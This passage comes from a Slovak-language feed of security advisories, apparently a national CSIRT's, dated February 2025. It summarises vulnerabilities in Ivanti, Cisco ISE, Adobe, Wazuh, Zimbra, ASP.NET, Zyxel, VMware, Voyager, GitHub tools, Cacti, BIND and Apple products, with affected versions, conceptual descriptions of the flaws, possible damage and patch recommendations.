Zraniteľnosť v Ivanti ICS a IPS spočívajúcu v možnosti externe kontrolovať názov súboru by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol zneužiť na vytvorenie a modifikáciu súborov na súborovom systéme.

CVE-2025-22467 (CVSS skóre 9,9)

Pretečenie vyrovnávacej pamäte zásobníka v rámci Ivanti ICS možno zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje autentifikáciu.

CVE-2024-10644 (CVSS skóre 9,1)

Bližšie nešpecifikovanú zraniteľnosť v Ivanti ICS a IPS by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol zneužiť na vzdialené vykonanie kódu.

Ivanti Cloud Services Application:

CVE-2024-47908 (CVSS skóre 9,1)

Zraniteľnosť sa nachádza vo webovej administratívnej konzole Ivanti CSA a vzdialený autentifikovaný útočník s oprávneniami administrátora by ju mohol zneužiť na vzdialené vykonanie kódu.

Ivanti Secure Access Client:

CVE-2024-13813 (CVSS skóre 7,1)

Vysoko závažná zraniteľnosť v Ivanti SAC spočíva v nedostatočnom nastavení oprávnení a umožňuje lokálnemu autentifikovanému útočníkovi zmazať ľubovoľné súbory na súborovom systéme.

Ostatné zraniteľnosti strednej závažnosti možno zneužiť na eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Eskalácia privilégií

Odporúčania:

Spoločnosť Ivanti odporúča bezodkladnú aktualizáciu Ivanti Connect Secure na verziu 22.7R2.6, Ivanti Policy Secure na verziu 22.7R1.3, Ivanti Secure Access Client na verziu 22.8R1 a Ivanti Cloud Services Application na verziu 5.0.5.

Zdroje:

Kritické bezpečnostné zraniteľnosti v Cisco Identity Services Engine

Marian Danko — Mon, 17 Feb 2025 14:38:19 +0000

Spoločnosť Cisco vydala bezpečnostné aktualizácie pre svoj produkt Cisco Identity Services Engine a Cisco Identity Services Engine – Passive Identity Connector, ktoré opravujú 2 kritické zraniteľnosti. Zraniteľnosti s označením CVE-2025-20124 a CVE-2025-20125 možno zneužiť na vzdialené vykonanie príkazov, eskaláciu privilégií, vykonanie neoprávnených zmien v systéme a zneprístupnenie služby.

Zraniteľné systémy:

Cisco Identity Services Engine (ISE) vo verziách starších ako 3.0 (vrátane)
Cisco Identity Services Engine (ISE) 3.1 vo verziách starších ako 3.1P10
Cisco Identity Services Engine (ISE) 3.2 vo verziách starších ako 3.2P7
Cisco Identity Services Engine (ISE) 3.3 vo verziách starších ako 3.3P4

Opis zraniteľnosti:

CVE-2025-20124 (CVSS skóre: 9,9)

Kritická CVE-2025-20124 sa nachádza v API rozhraní Cisco ISE a ISE-PIC a spočíva v nezabezpečenej deserializácii bajtových prúdov Java (eng. byte streams). Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených serializovaných objektov Java cez API mohol zneužiť na eskaláciu privilégií a vzdialené vykonanie príkazov v kontexte používateľa root.

CVE-2025-20125 (CVSS skóre: 9,1)

Zraniteľnosť v API rozhraní spočíva v chýbajúcej autorizácii vybraných koncových bodov API a nesprávnom overovaní používateľských vstupov. Zaslaním špeciálne vytvorených HTTP požiadaviek ju možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, modifikáciu konfigurácie zariadenia alebo vyvolanie jeho reštartu.

Pozn.: Úspešné zneužitie predmetných zraniteľností vyžaduje znalosť platných prihlasovacích údajov pre ľubovoľné administrátorské účty na ISE, pričom postačujú aj účty s read-only oprávneniami.

Možné škody:

Vzdialené vykonanie príkazov
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Zneprístupnenie služby

Odporúčania:

Spoločnosť Cisco odporúča bezodkladnú aktualizáciu zraniteľných inštancií Cisco Identity Services Engine na verzie 3.1P10, 3.2P7, 3.3P4 alebo 3.4.

Zdroje:

Kritické bezpečnostné zraniteľnosti v produktoch Adobe

Marian Danko — Mon, 17 Feb 2025 14:36:08 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty InDesign, Commerce, Substance 3D Stager, InCopy, Illustrator, Substance 3D Designer a Photoshop Elements, ktoré opravujú 45 zraniteľností, z čoho 23 je označených ako kritických. Kritické zraniteľnosti by útočník mohol zneužiť na vykonanie škodlivého kódu, obídenie bezpečnostných prvkov a eskaláciu privilégií.

Zraniteľné systémy:

Adobe InDesign ID20.X vo verziách starších ako ID20.1
Adobe InDesign ID19.X vo verziách starších ako ID19.5.2
Adobe InCopy 20.X vo verziách starších ako 20.1
Adobe InCopy 19.X vo verziách starších ako 19.5.2
Adobe Illustrator 2025 29.X vo verziách starších ako 29.2.1
Adobe Illustrator 2024 28.X vo verziách starších ako 28.7.4
Adobe Adobe Substance 3D Designer 14.X vo verziách starších ako 14.1
Adobe Photoshop Elements for macOS 2025.X vo verziách starších ako 2025.1 [build: 20250124.PSE.f552973b, 20250124.PSE.5345f07d (Mac ARM)]
Adobe Substance 3D Stager 3.X vo verziách starších ako 3.1.1
Adobe Commerce 2.4.8 vo verziách starších ako 2.4.8-beta2
Adobe Commerce 2.4.7 vo verziách starších ako 2.4.7-p4
Adobe Commerce 2.4.6 vo verziách starších ako 2.4.6-p9
Adobe Commerce 2.4.5 vo verziách starších ako 2.4.5-p11
Adobe Commerce 2.4.4 vo verziách starších ako 2.4.4-p12
Adobe Commerce 1.5.1 vo verziách starších ako 1.5.1
Adobe Commerce B2B 1.4.2 vo verziách starších ako 1.4.2-p4
Adobe Commerce B2B 1.3.5 vo verziách starších ako 1.3.5-p9
Adobe Commerce B2B 1.3.4 vo verziách starších ako 1.3.4-p11
Adobe Commerce B2B 1.3.3 vo verziách starších ako 1.3.3-p12
Magento Open Source 2.4.8 vo verziách starších ako 2.4.8-beta2
Magento Open Source 2.4.7 vo verziách starších ako 2.4.7-p4
Magento Open Source 2.4.6 vo verziách starších ako 2.4.6-p9
Magento Open Source 2.4.5 vo verziách starších ako 2.4.5-p11
Magento Open Source 2.4.4 vo verziách starších ako 2.4.4-p12
Adobe Commerce and Magento Open Source bez aplikovanej záplaty pre CVE-2025-24434

Opis zraniteľnosti:

Adobe InDesign:

CVE-2025-21157, CVE-2025-21158, CVE-2025-21121, CVE-2025-21123 (CVSS skóre 7,8)

Kritické zraniteľnosti v produkte Adobe InDesign spočívajú v podtečení celočíselnej premennej (CVE-2025-21158), zápise mimo povolené hodnoty (CVE-2025-21157, CVE-2025-21121) a pretečení medzipamäte haldy (CVE-2025-21123). Podvrhnutím špeciálne vytvorených súborov ich možno zneužiť na vykonanie škodlivého kódu.

Adobe InCopy:

CVE-2025-21156 (CVSS skóre 7,8)

Podtečenie celočíselnej premennej možno zneužiť na vzdialené vykonanie kódu s následkom úplného narušenia dôvernosti, integrity a dostupnosti systému.

Adobe Illustrator:

CVE-2025-21159, CVE-2025-21160, CVE-2025-21163 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v podtečení celočíselnej premennej (CVE-2025-21160), použití odalokovaného miesta v pamäti (CVE-2025-21159) a pretečení vyrovnávacej pamäte zásobníka (CVE-2025-21163) možno zneužiť na vzdialené vykonanie kódu.

Adobe Substance 3D Designer:

CVE-2025-21161 (CVSS skóre 7,8)

Zraniteľnosť s označením CVE-2025-21161 možno prostredníctvom zápisu mimo povolených hodnôt zneužiť na vzdialené vykonanie kódu.

Adobe Commerce:

CVE-2025-24408 (CVSS skóre 8,1); CVE-2025-24406 (CVSS skóre 7,5)

Uvedené zraniteľnosti možno prostredníctvom tzv. path traversal útokov a na základe verejne dostupných informácií systému zneužiť na eskaláciu privilégií. Zneužitie uvedených zraniteľností nevyžaduje interakciu zo strany používateľa.

CVE-2025-24434 (CVSS skóre 9,4); CVE-2025-24409 (CVSS skóre 8,2); CVE-2025-24407 (CVSS skóre 7,1);

Bližšie nešpecifikované zraniteľnosti spočívajúce v nesprávnej autorizácii možno zneužiť na eskaláciu privilégií (CVE-2025-24434) a obídenie bezpečnostných prvkov (CVE-2025-24409, CVE-2025-24407). Zneužitie uvedených zraniteľností nevyžaduje interakciu zo strany používateľa.

CVE-2025-24411 (CVSS skóre 8,8)

Nesprávne riadenie prístupov možno zneužiť na obídenie bezpečnostných prvkov a úplné narušenie dôvernosti, integrity a dostupnosti systému. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

CVE-2025-24417, CVE-2025-24416, CVE-2025-24415, CVE-2025-24414, CVE-2025-24413, CVE-2025-24412 (CVSS skóre 8,9); CVE-2025-24438, CVE-2025-24410 (CVSS skóre 8,7)

Predmetné zraniteľnosti možno zneužiť na realizáciu perzistentných XSS útokov (stored cross-site scripting).

Ostatné zraniteľnosti:

Zneužitím ostatných vysoko závažných zraniteľností možno získať neoprávnený prístup k citlivým údajom, eskaláciu privilégií a spôsobiť zneprístupnenie služby.

Ak nie je uvedené inak, zneužitie vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa.

Možné škody:

Vykonanie škodlivého kódu
Obídenie bezpečnostného prvku
Získanie neoprávneného prístupu k citlivým údajom
Zneprístupnenie služby
Eskalácia privilégií

Odporúčania:

Zdroje:

Mesačný prehľad kritických zraniteľností január 2025

Marian Danko — Mon, 17 Feb 2025 14:31:45 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2025.

Mesačný prehľad – 01/2025 PDF (564 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Kritická zraniteľnosť Wazuh umožňuje vykonávať kód

Marian Danko — Tue, 11 Feb 2025 15:44:22 +0000

Vývojári open-source SIEM a XDR platformy Wazuh vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. Táto umožňuje vzdialene vykonávať kód Python. Na uvedenú zraniteľnosť je dostupný proof-of-concept kód demonštrujúci postup jej zneužitia.

Zraniteľné systémy:

Wazuh 4.4.0 až 4.9.0

Opis činnosti:

CVE-2025-24016 (CVSS skóre 9,9)

Kritická zraniteľnosť spočíva v nezabezpečenej deserializácii objektov a umožňuje vzdialené vykonávanie kódu písaného v jazyku Python na zraniteľných serveroch Wazuh. Útočník môže zneužiť komponent DistributedAPI (DAPI) injektovaním dát do API požiadavky alebo odpovede. V určitých konfiguráciách môže na útok zneužiť kompromitovaného agenta.

Chyba sa nachádza v deserializačnej funkcii as_wazuh_object a podvrhnutím vhodne upravenej premennej typu dictinary do DAPI požiadavky alebo odpovede môže útočník vyvolať neošetrenú výnimku, čo povedie k vykonaniu ľubovoľného kódu v jazyku Python.

Na uvedenú zraniteľnosť je dostupný proof-of-concept kód demonštrujúci postup jej zneužitia.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia Wazuh aspoň na verziu 4.9.1.

Odkazy:

Kritické zraniteľnosti Zimbra Collaboration

Marian Danko — Tue, 11 Feb 2025 15:40:46 +0000

V produkte Zimbra Collaboration boli opravené dve kritické a jedna stredne závažná zraniteľnosť. Tieto umožňujú útočníkom získať metadáta e-mailov alebo presmerovanie na koncové body v rámci vnútornej siete.

Zraniteľné systémy:

Zimbra Collaboration staršie ako 10.0.12 a 10.1.4

Opis činnosti:

CVE-2025-25064 (CVSS skóre 9,8)

Kritická zraniteľnosť v ZimbraSync Service SOAP súvisí s nedostatočnou sanitizáciou používateľských vstupov v nešpecifikovanom parametri. Umožňuje vykonávať útoky typu SQL injection a získať metadáta e-mailov.

CVE-2025-25065 (CVSS skóre 5,3)

V parsovacom nástroji RSS sa nachádza zraniteľnosť umožňujúca útoky typu SSRF a presmerovanie na koncové body vo vnútornej sieti.

Okrem toho Zimbra opravila kritickú zraniteľnosť v Classic Web Client, ktorá umožňuje vykonanie perzistentného XSS útoku. Zraniteľnosť je zatiaľ bez onačenia.

Možné škody:

Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia Zimbra Collaboration na verziu 9.0.0 Patch 44, 10.0.13, alebo 10.1.5.

Odkazy:

Útočníci aktívne zneužívajú verejne dostupné ASP.NET kľúče na vzdialené vykonanie kódu

Marian Danko — Tue, 11 Feb 2025 13:57:10 +0000

Spoločnosť Microsoft varovala pred útokmi na aplikácie ASP.NET, v rámci ktorých útočníci na vzdialené vykonanie kódu a šírenie malvéru zneužívajú verejne dostupné statické strojové kľúče (machine keys) ASP.NET.

Zraniteľné systémy:

ASP.NET aplikácie s verejne dostupnými kľúčmi

Opis zraniteľnosti:

Mnohí vývojári nedodržiavaním pravidiel bezpečného vývoja v rámci aplikácií využívajú validationKey a decryptionKey, ktoré je možné nájsť vo verejne dostupných zdrojoch ako sú napr. dokumentácia alebo repozitáre zdrojového kódu.

Uvedené kľúče sú navrhnuté na ochranu ViewState používaných v rámci webových formulárov ASP.NET Web Forms na kontrolu stavu a zachovanie stránok. Z pohľadu útočníka ich možno zneužiť na vytvorenie škodlivých payloadov so správnym MAC (Message Authentication Code) slúžiacim na overenie integrity a autenticity správy. Škodlivé ViewState sú prostredníctvom HTTP POST požiadaviek zaslané na IIS servery, kde ASP.NET Runtime vykoná ich dešifrovanie a overenie MAC. Pretože bol kód MAC vytvorený prostredníctvom správnych kľúčov, dochádza k nahratiu payloadu do pamäte a jeho následnému spusteniu.

Spoločnosť Microsoft identifikovala vyše 3 000 uniknutých kľúčov, ktorých hashe za účelom preverenia sprístupnila vo forme CSV súboru na svojom GitHub repozitári. Prítomnosť Vašich kľúčov v tomto zozname môžete skontrolovať prostredníctvom PowerShell skriptu.

Na základe dostupných informácií útočníci verejne dostupné kľúče zneužívajú minimálne od decembra 2024, kedy boli zneužité na kompromitáciu systémov post-exploitačným frameworkom Godzilla.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a vývojárom odporúčame overiť či ich aplikácie nepoužívajú verejne dostupné kľúče ASP.NET. Kompletný postup môžete nájsť v časti „Recommendations“ na webovej stránke spoločnosti Microsoft.

V rámci preventívnych opatrení spoločnosť odporúča dodržiavať pravidlá bezpečného vývoja softvéru a v súvislosti vývojom aplikácií ASP.NET:

Nepoužívať predvolené alebo verejne dostupné kľúče
Šifrovať elementy machineKey a connectionStrings v rámci súborov web.config
Aktualizovať ASP.NET framework aspoň na verziu 4.8, ktorá umožňuje využitie funkcie AMSI (Antimalware Scan Interface)
Zabezpečiť (hardenovať) servery Windows s dôrazom na minimalizáciu attack surface (verejne dostupné služby a koncové body)

Zdroje:

Aktívne zneužívané zero-day zraniteľnosti v Zyxel zariadeniach série CPE

Marian Danko — Tue, 11 Feb 2025 13:53:11 +0000

Bezpečnostní výskumníci z Greynoise a Vulncheck varujú pred aktívnym zneužívaním kritických zero-day zraniteľností v zariadeniach Zyxel CPE. CVE-2024-40891 a CVE-2024-40891 možno zneužiť na vzdialené vykonanie príkazov a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Zariadenia Zyxel série CPE (Customer Premises Equipment): VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, SBG3500

Opis zraniteľnosti:

CVE-2024-40890, CVE-2024-40891 (CVSS skóre 8,8)

Bližšie nešpecifikované zraniteľnosti by vzdialený autentifikovaný útočník mohol zneužiť na injekciu príkazov prostredníctvom servisných účtov „supervisor“ alebo „zyuser“ a získanie úplnej kontroly nad systémom. Zatiaľ čo zraniteľnosť CVE-2024-40891 je možné zneužiť prostredníctvom protokolu Telnet, CVE-2024-40890 možno zneužiť zaslaním špeciálne vytvorených http POST požiadaviek.

Zraniteľnosti odhalila spoločnosť VulnCheck ešte v júli 2024, ale na základe dostupných informácií stále neboli opravené.

Zraniteľnosť CVE-2024-40891 v súčasnosti aktívne zneužívajú rôzne varianty botnetov založených na báze Mirai.

Možné škody:

Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Uvedené zraniteľnosti spoločnosť Zyxel neopraví, pretože zasiahnuté zariadenia dosiahli tatus end-of-life. Odporúčame preto vymeniť zraniteľné zariadenie za podporované. V prípade, že to nie je možné, odporúčame limitovať prístup k administratívnym rozhraniam zariadení a vykonávať zvýšený monitoring HTTP a TELNET komunikácie.

Zdroje:

Vysoko závažné zraniteľnosti v produktoch VMware AVI Load Balancer, Aria Operations a Cloud Foundation

Marian Danko — Tue, 11 Feb 2025 13:49:43 +0000

Spoločnosť Broadcom vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností v produktoch VMware AVI Load Balancer, Aria Operations a Cloud Foundation, z ktorých 4 sú označené ako vysoko závažné. Najzávažnejšie zraniteľnosti možno zneužiť na získanie neoprávneného prístupu k databáze (CVE-2025-22217 – AVI Load Balancer) a k prihlasovacím údajom produktov VMware integrovaných do Aria Operations for Logs (CVE-2025-22218).

Zraniteľné systémy:

VMware AVI Load Balancer 30.1.X vo verziách starších ako 30.1.2-2p2
VMware AVI Load Balancer 30.2.1 vo verziách starších ako 30.2.1-2p5
VMware AVI Load Balancer 30.2.1 vo verziách starších ako 30.2.2-2p2
VMware Aria Operations for Logs 8.x vo verziách starších ako 8.18.3
VMware Aria Operations 8.x vo verziách starších ako 8.18.3
VMware Cloud Foundation 4.x a 5.x bez aplikovanej záplaty KB92148

Opis zraniteľnosti:

VMware AVI Load Balancer:

CVE-2025-22217 (CVSS skóre 8,6)

Zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov a vzdialený neautentifikovaný útočník by ju prostredníctvom SQL injekcie mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom v databáze.

VMware Aria Operations for Logs, VMware Cloud Foundation:

CVE-2025-22218 (CVSS skóre 8,5)

Zraniteľnosť CVE-2025-22218 by mohol vzdialený autentifikovaný útočník s oprávneniami úrovne „View Only Admin“ zneužiť na získanie neoprávneného prístupu k prihlasovacích údajom produktov VMware integrovaných do VMware Aria Operations for Logs.

CVE-2025-22222 (CVSS skóre 7,7)

Zraniteľnosť by vzdialený autentifikovaný útočník bez administrátorských oprávnení mohol zneužiť na získanie prihlasovacích údajov pre moduly. Zneužitie zraniteľnosti vyžaduje znalosť platného identifikátora „Service Credential ID“.

VMware Aria Operations, VMware Cloud Foundation:

CVE-2025-22219 (CVSS skóre 6,8)

Predmetnú zraniteľnosť by vzdialený autentifikovaný útočník mohol zneužiť na realizáciu perzistentných XSS (Cross Site Scripting) útokov s následkom vykonania neoprávnených zmien v systéme, ktoré vyžadujú administrátorské oprávnenia.

Možné škody:

Únik citlivých údajov
Vzdialené vykonanie kódu
Neoprávnená zmena v systéme

Odporúčania:

Odporúčame vykonať aktualizáciu zraniteľných systémov aspoň na verzie

VMware AVI Load Balancer 30.1.2-2p2, 30.2.1-2p5, alebo 30.2.2-2p2
VMware Aria Operations for Logs 8.18.3
VMware Aria Operations 8.18.3
VMware Cloud Foundation 4.x a 5.x záplata KB92148

Zdroje:

Vysoko závažné zraniteľnosti v PHP balíku Voyager používaného na správu aplikácií Laravel

Marian Danko — Tue, 11 Feb 2025 13:45:53 +0000

Bezpečnostní výskumníci zo spoločnosti SonarSource zverejnili informácie o 3 bezpečnostných zraniteľnostiach open-source PHP balíka Voyager používaného na správu Laravel aplikácií. Zreťazením zraniteľností CVE-2024-55417 a CVE-2024-55416 možno dosiahnuť vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

PHP balík Voyager vo verziách starších ako 1.8.0 (vrátane)

Opis zraniteľnosti:

CVE-2024-55417 (CVSS skóre 8,8)

Zraniteľnosť v komponente pre nahrávanie súborov dostupnom prostredníctvom /admin/media/upload spočíva v nedostatočnom overovaní MIME typu nahrávaných súborov vo funkcii getMimeType. Vzdialený útočník by ju podvrhnutím špeciálne vytvorených súborov typu polyglot (interpretovateľných ako viacero typov súborov alebo obsahujúcich časti vytvorené vo viacerých programovacích jazykoch) mohol zneužiť na nahratie ľubovoľných súborov, vrátane PHP webshellov.

Pozn.: Vykonanie kódu vyžaduje oprávnenia úrovne browse_media, ktoré možno získať napr. zneužitím zraniteľnosti CVE-2024-55416.

CVE-2024-55416 (CVSS skóre 6,1)

CVE-2024-55416 spočíva v nedostatočnom overovaní používateľských vstupov v rámci komponentu /admin/compass. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu reflektovaných XSS (Cross Site Scripting) útokov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany autentifikovaných používateľov, ktorí musia kliknúť na špeciálne vytvorenú URL.

CVE-2024-55415 (CVSS skóre 7,5)

CVE-2024-55415 v komponente pre manažment súborov by vzdialený neautentifikovaný útočník mohol zneužiť na modifikáciu súborových ciest, čítanie a zmazanie súborov na súborovom systéme. Neoprávnené zmazanie súborov kritických pre chod aplikácie môže viesť k zneprístupneniu služby.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnená zmena v systéme
Únik citlivých údajov
Zneprístupnenie služby
Získanie úplnej kontroly nad systémom

Odporúčania:

Na uvedené zraniteľnosti v súčasnosti nie sú dostupné bezpečnostné aktualizácie. Administrátorom odporúčame sledovať stránku výrobcu a po vydaní záplat vykonať bezodkladnú aktualizáciu zraniteľných systémov. Do vydania aktualizácií odporúčame uvedený balík nepoužívať alebo použiť alternatívny produkt bez známych bezpečnostných zraniteľností.

Zdroje:

Zraniteľnosti v nástrojoch platformy GitHub možno zneužiť na získanie autentifikačných údajov

Marian Danko — Tue, 11 Feb 2025 13:43:54 +0000

Vývojári platformy GitHub vydali bezpečnostné aktualizácie svojich produktov GitHub Desktop, Git LFS, GitHub CLI/Codespaces a Git Credential Manager, ktoré opravujú 4 zraniteľnosti, z čoho 2 sú označené ako vysoko závažné. Zraniteľnosti súhrnne označené ako „Clone2Leak“ možno zneužiť na získanie neoprávneného prístupu k prihlasovacím údajom a autentifikačným tokenom.

Zraniteľné systémy:

GitHub Desktop vo verziách 3.3.15 a starších
Git Credential Manager vo verziách 2.6.0 a starších
Git LFS vo verziách 0.1.0 až 3.6.0
Git CLI vo verziách 2.62.0 a starších

Opis zraniteľnosti:

GitHub Desktop:

CVE-2025-23040 (CVSS skóre 6,6)

GitHub Desktop pri iniciácii klonovania repozitára na pozadí volá príkaz „git clone“, ktorý si pri klonovaní vzdialeného repozitára vyžadujúceho autentifikáciu od aplikácie vypýta prihlasovacie údaje prostredníctvom protokolu „git-credential“. Podvrhnutím špeciálne vytvorenej URL adresy je zraniteľnosť možné zneužiť na získanie uložených prihlasovacích údajov a OAuth tokenov uložených v aplikácii.

Git Credential Manager:

CVE-2024-50338 (CVSS skóre 7,4)

Zraniteľnosť spočíva v nesúlade spracovania špeciálnych znakov pre ukončenie riadku medzi Git a Git Credential Manager a vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorenej URL adresy mohol zneužiť na získanie uložených prihlasovacích údajov.

Git LFS:

CVE-2024-53263 (CVSS skóre 8,5)

Zraniteľnosť spočíva v nesprávnom spracovaní častí URL spracovávaných v rámci „git-credential“ a podvrhnutím špeciálne vytvorenej URL obsahujúcej znaky pre ukončenie riadka (LF – Line Feed, CR – Carriage Return) ju možno zneužiť na získanie prihlasovacích údajov.

Git CLI:

CVE-2024-53858 (CVSS skóre 6,5)

Zraniteľnosť v Github CLI (Command Line Interface) pri klonovaní repozitárov obsahujúcich git submoduly hostované mimo domén github.com a ghe.com umožňuje neoprávnený prístup k autentifikačným tokenom.

Pozn.: Zneužitie všetkých zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí spustiť klonovanie obsahu (git clone) alebo vykonať interakciu so škodlivým repozitárom pod kontrolou útočníka.

Možné škody:

Neoprávnený prístup k citlivým údajom

Odporúčania:

Odporúčame vykonať aktualizáciu produktov GitHub Desktop na verziu 3.4.12, Git Credential Manager na verziu 2.6.1, Git LFS na verziu 3.6.1 a Git CLI na verziu 2.63.0.

Zdroje:

Kritická zraniteľnosť monitorovacieho a manažmentového frameworku Cacti

Marian Danko — Tue, 11 Feb 2025 13:40:58 +0000

Vývojári open-source monitorovacieho a manažmentového frameworku Cacti vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve zraniteľnosti, z čoho jedna je označená ako kritická. Kritickú zraniteľnosť s označením CVE-2025-22604 možno zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Cacti vo verziách starších ako 1.2.29

Opis zraniteľnosti:

CVE-2025-22604 (CVSS skóre 9,1)

Kritická zraniteľnosť spočíva v nesprávnom parsovaní viacriadkových výsledkov SNMP v rámci funkcií ss_net_snmp_disk_io() a ss_net_snmp_disk_bytes(). Vzdialený autentifikovaný útočník by ju podvrhnutím špeciálne vytvorených identifikátorov objektov (OID) mohol zneužiť na vzdialené vykonanie kódu.

CVE-2025-24367 (CVSS skóre 8,7)

CVE-2025-24367 vo funkcionalitách pre prácu s grafmi spočívajúcu v nesprávnom spracovaní znakov pre ukončenie riadka by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu. Umožňuje mu vytvárať PHP skripty v koreňovom priečinku aplikácie.

Pozn.: Na uvedenú zraniteľnosť je v súčasnosti dostupný Proof of Concept kód demonštrujúci postup jej zneužitia.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu inštancií Cacti na verziu 1.2.29.

Zdroje:

Vysoko závažné zraniteľnosti v DNS systéme BIND možno zneužiť na zneprístupnenie služby

Marian Danko — Tue, 11 Feb 2025 13:38:37 +0000

Vývojári DNS systému BIND vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve vysoko závažné zraniteľnosti. CVE-2024-12705 a CVE-2024-11187 možno zneužiť na zahltenie dostupných prostriedkov a zneprístupnenie služby.

Zraniteľné systémy:

BIND vo verziách od 9.11.0 do 9.11.37 (vrátane)
BIND vo verziách od 9.16.0 do 9.16.50 (vrátane)
BIND vo verziách od 9.18.0 do 9.18.32 (vrátane)
BIND vo verziách od 9.20.0 do 9.20.4 (vrátane)
BIND vo verziách od 9.21.0 do 9.21.3 (vrátane)
BIND Supported Preview Edition vo verziách od 9.11.3-S1 do 9.11.37-S1 (vrátane)
BIND Supported Preview Edition vo verziách od 9.16.8-S1 do 9.16.50-S1 (vrátane)
BIND Supported Preview Edition vo verziách od 9.18.11-S1 do 9.18.32-S1 (vrátane)

Pozn.: Prítomnosť zraniteľností nebola preverovaná v rámci BIND vo verziách starších ako 9.11.37 a BIND Supported Preview Edition vo verziách starších ako 9.11.37-S1 (CVE-2024-11187) a 9.18.27 a BIND Supported Preview Edition vo verziách starších ako 9.18.27-S1 (CVE-2024-12705) .

Opis zraniteľnosti:

CVE-2024-12705 (CVSS skóre 7,5)

Zraniteľnosť by vzdialený neautorizovaný útočník zaplavením resolvera veľkým objemom HTTP/2 prevádzky mohol zneužiť na zahltenie dostupných prostriedkov (procesor, operačná pamäť) a následné zneprístupnenie služby spočívajúce v nemožnosti vytvorenia nových DoH (DNS-over-HTTPS) spojení.

Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách s aktivovaným DNS-over-HTTPS.

CVE-2024-11187 (CVSS skóre 7,5)

Zaslaním bližšie nešpecifikovaných požiadaviek na špeciálne vytvorené zóny dochádza ku generovaniu odpovedí s veľkým množstvom záznamov v sekcii Additional, ktoré vedú k zahlteniu výpočtových prostriedkov autoritatívnych serverov a nezávislých resolverov a zneprístupneniu služby.

Pozn.: Zneužitie zraniteľnosti je možné mitigovať nastavením „minimal-responses yes;“

Možné škody:

Zneprístupnenie služby

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu BIND na verzie 9.18.33, 9.20.5 alebo 9.21.4 a BIND Supported Preview Edition na verziu 9.18.33-S1.

Zdroje:

Kritické a aktívne zneužívaná zero-day zraniteľnosť v produktoch Apple

Marian Danko — Tue, 11 Feb 2025 13:36:20 +0000

Spoločnosť APPLE vydala bezpečnostné aktualizácie, ktoré opravujú 69 bezpečnostných zraniteľností v operačných systémoch iOS, iPadOS, macOS, tvOS, watchOS a visionOS a webovom prehliadači Safari, z čoho 18 je označených ako kritických a 1 ako aktívne zneužívaná zero-day zraniteľnosť. Aktívne zneužívanú zero-day s označením CVE-2025-24085 možno zneužiť na eskaláciu privilégií na zariadeniach s tvOS, watchOS, macOS Sequoia, iOS, iPadOS a visionOS.

Zraniteľné systémy:

Safari vo verziách starších ako 18.3 (celkom 7 zraniteľností)
tvOS vo verziách starších ako 18.3 (celkom 17 zraniteľností)
watchOS vo verziách starších ako 11.3 (celkom 17 zraniteľností)
macOS Ventura vo verziách starších ako 13.7.3 (celkom 31 zraniteľností)
macOS Sonoma vo verziách starších ako 14.7.3 (celkom 41 zraniteľností)
macOS Sequoia vo verziách starších ako 15.3 (celkom 60 zraniteľností)
iPadOS 17.X vo verziách starších ako 17.7.4 (celkom 16 zraniteľností)
iOS vo verziách starších ako 18.3 (celkom 28 zraniteľností)
iPadOS 18.X vo verziách starších ako 18.3 (celkom 28 zraniteľností)
visionOS vo verziách starších ako 2.3 (celkom 20 zraniteľností)

Opis zraniteľnosti:

CVE-2025-24093 (CVSS skóre 9,8)

Operačné systémy macOS Ventura a macOS Sonoma obsahujú zraniteľnosť v komponente Sandbox, ktorú možno zneužiť na získanie neoprávneného prístupu k prenosným médiám.

CVE-2025-24102 (CVSS skóre 9,8)

Komponent CoreRoutine v rámci macOS Ventura, macOS Sonoma, macOS Sequoia a iPadOS obsahuje zraniteľnosť umožňujúcu získanie polohy používateľa.

CVE-2025-24106 (CVSS skóre 9,8)

macOS Ventura, macOS Sonoma a macOS Sequoia v komponente Audio obsahujú zraniteľnosť, ktorú možno podvrhnutím špeciálne vytvorených súborov zneužiť na zneprístupnenie služby.

CVE-2025-24109 (CVSS skóre 9,8)

